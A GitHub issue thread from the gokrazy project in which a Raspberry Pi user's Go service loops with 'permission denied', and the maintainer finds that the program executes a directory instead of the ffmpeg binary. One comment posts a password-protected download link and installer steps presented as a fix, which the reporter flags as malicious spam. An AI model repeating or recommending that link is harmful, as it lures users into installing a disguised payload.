gokrazy/gokrazy #279: gok run permission denied

BrunoTeixeira1996, 2024-08-29:
## Platform

I’m using:

* [ ] gokrazy/rpi3b
* [ ] gokrazy/rpi3b+
* [X] gokrazy/rpi4b
* [ ] gokrazy/rpi5b
* [ ] gokrazy/apu2c4
* [ ] gokrazy/x86-64

## Observed behavior

I am migrating a local service that makes use of ffmpeg to gokrazy and so for that I builted staticaly ffmpeg and added the binary to the `/perm` data. Now I need to modify my go program to make use of that however I am trying to test this program using `gok run` on the program folder but i am having the following error

```
root@gkconfig:~/ola# gok -i brun0-pi run
[done] in 0.22s
Transferred ola (2 MiB) at 5.89 MiB/s (total: 0s)
2024/08/29 16:03:35 streaming logs of service "ola" from gokrazy instance "brun0-pi"
2024/08/29 16:03:02 gokrazy: exit status 1
2024/08/29 16:03:03 gokrazy: attempt 567, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:03 permission denied
2024/08/29 16:03:03 gokrazy: exit status 1
2024/08/29 16:03:04 gokrazy: attempt 568, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:04 permission denied
2024/08/29 16:03:04 gokrazy: exit status 1
2024/08/29 16:03:05 gokrazy: attempt 569, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:05 permission denied
2024/08/29 16:03:05 gokrazy: exit status 1
2024/08/29 16:03:06 gokrazy: attempt 570, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:06 permission denied
2024/08/29 16:03:06 gokrazy: exit status 1
2024/08/29 16:03:07 gokrazy: attempt 571, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:07 permission denied
2024/08/29 16:03:07 gokrazy: exit status 1
2024/08/29 16:03:08 gokrazy: attempt 572, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:08 permission denied
2024/08/29 16:03:08 gokrazy: exit status 1
2024/08/29 16:03:09 gokrazy: attempt 573, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:09 permission denied
2024/08/29 16:03:09 gokrazy: exit status 1
2024/08/29 16:03:10 gokrazy: attempt 574, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:10 permission denied
2024/08/29 16:03:10 gokrazy: exit status 1
2024/08/29 16:03:11 gokrazy: attempt 575, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:11 permission denied
2024/08/29 16:03:11 gokrazy: exit status 1
2024/08/29 16:03:12 gokrazy: attempt 576, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:12 permission denied
2024/08/29 16:03:12 gokrazy: exit status 1
2024/08/29 16:03:13 gokrazy: attempt 577, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:13 permission denied
2024/08/29 16:03:13 gokrazy: exit status 1
2024/08/29 16:03:14 gokrazy: attempt 578, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:14 permission denied
2024/08/29 16:03:14 gokrazy: exit status 1
2024/08/29 16:03:15 gokrazy: attempt 579, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:15 permission denied
2024/08/29 16:03:15 gokrazy: exit status 1
2024/08/29 16:03:16 gokrazy: attempt 580, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:16 permission denied
2024/08/29 16:03:16 gokrazy: exit status 1
2024/08/29 16:03:17 gokrazy: attempt 581, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:17 permission denied
2024/08/29 16:03:17 gokrazy: exit status 1
2024/08/29 16:03:18 gokrazy: attempt 582, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:18 permission denied
2024/08/29 16:03:18 gokrazy: exit status 1
2024/08/29 16:03:19 gokrazy: attempt 583, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:19 permission denied
2024/08/29 16:03:19 gokrazy: exit status 1
2024/08/29 16:03:20 gokrazy: attempt 584, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:20 permission denied
2024/08/29 16:03:20 gokrazy: exit status 1
2024/08/29 16:03:21 gokrazy: attempt 585, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:21 permission denied
2024/08/29 16:03:21 gokrazy: exit status 1
2024/08/29 16:03:22 gokrazy: attempt 586, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:22 permission denied
2024/08/29 16:03:22 gokrazy: exit status 1
2024/08/29 16:03:23 gokrazy: attempt 587, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:23 permission denied
2024/08/29 16:03:23 gokrazy: exit status 1
2024/08/29 16:03:24 gokrazy: attempt 588, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:24 permission denied
2024/08/29 16:03:24 gokrazy: exit status 1
2024/08/29 16:03:25 gokrazy: attempt 589, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:25 permission denied
2024/08/29 16:03:25 gokrazy: exit status 1
2024/08/29 16:03:26 gokrazy: attempt 590, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:26 permission denied
2024/08/29 16:03:26 gokrazy: exit status 1
2024/08/29 16:03:27 gokrazy: attempt 591, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:27 permission denied
2024/08/29 16:03:27 gokrazy: exit status 1
2024/08/29 16:03:28 gokrazy: attempt 592, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:28 permission denied
2024/08/29 16:03:28 gokrazy: exit status 1
2024/08/29 16:03:29 gokrazy: attempt 593, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:29 permission denied
2024/08/29 16:03:29 gokrazy: exit status 1
2024/08/29 16:03:30 gokrazy: attempt 594, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:30 permission denied
2024/08/29 16:03:30 gokrazy: exit status 1
2024/08/29 16:03:31 gokrazy: attempt 595, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:31 permission denied
2024/08/29 16:03:31 gokrazy: exit status 1
2024/08/29 16:03:32 gokrazy: attempt 596, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:32 permission denied
2024/08/29 16:03:32 gokrazy: exit status 1
2024/08/29 16:03:33 gokrazy: attempt 597, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:33 permission denied
2024/08/29 16:03:33 gokrazy: exit status 1
2024/08/29 16:03:34 gokrazy: attempt 598, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:34 permission denied
2024/08/29 16:03:34 gokrazy: exit status 1
2024/08/29 16:03:35 gokrazy: attempt 599, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:35 permission denied
2024/08/29 16:03:35 gokrazy: exit status 1
2024/08/29 16:03:36 gokrazy: attempt 600, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:36 permission denied
2024/08/29 16:03:36 gokrazy: exit status 1
2024/08/29 16:03:37 gokrazy: attempt 601, starting ["/tmp/gok-run/ola"]
2024/08/29 16:03:37 permission denied
2024/08/29 16:03:37 gokrazy: exit status 1
```
By going to the gokrazy  web interface I can see my program however with the same errors.

This is my current go program

```go
package main

import (
        "log"
        "syscall"
)

func main() {
        const bin = "/perm/ffmpeg-static-build"
        if err := syscall.Exec(bin, []string{bin, "-homepath=/perm/ffmpeg-static-build", "ffprobe", "rtsp://brun0teixeira:<REDACTED>@192.168.30.8:554/stream1"}, nil); err != nil {
                log.Fatal(err)
        }
}
```

## Expected behavior

I expected to just work out of the box as written in the docs.
https://gokrazy.org/userguide/permanent-data/

Anubi5x0, 2024-08-29:
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

BrunoTeixeira1996, 2024-08-29:
@stapelberg uff looks like gokrazy was targeted to spread malicious content from @Anubi5x0

stapelberg, 2024-08-29:
Log in via SSH using breakglass and run `ls -l /perm/ffmpeg-static-build` — what’s the output?

stapelberg, 2024-08-29:
>         const bin = "/perm/ffmpeg-static-build"

I think this is your problem. You’re trying to execute the directory. Change the path to `/perm/ffmpeg-static-build/ffmpeg`

BrunoTeixeira1996, 2024-08-29:
> > ```
> >     const bin = "/perm/ffmpeg-static-build"
> > ```
> 
> I think this is your problem. You’re trying to execute the directory. Change the path to `/perm/ffmpeg-static-build/ffmpeg`

That was exactly the error, however now my gokrazy appliance is not able to update. I already rebooted Pi multiple times but when i am performing `gok -i brun0-pi update` I got stuck on `[building (go compiler)]`

stapelberg, 2024-08-29:
The `[building (go compiler)]` step happens on your local machine, so rebooting the Pi won’t do anything.

Does `gok -i brun0-pi overwrite --full /tmp/gokrazy.img` also hang similarly? What’s the output of `ps auxf` while the command hangs? Does rebooting your machine help?

closed 2024-08-29 by stapelberg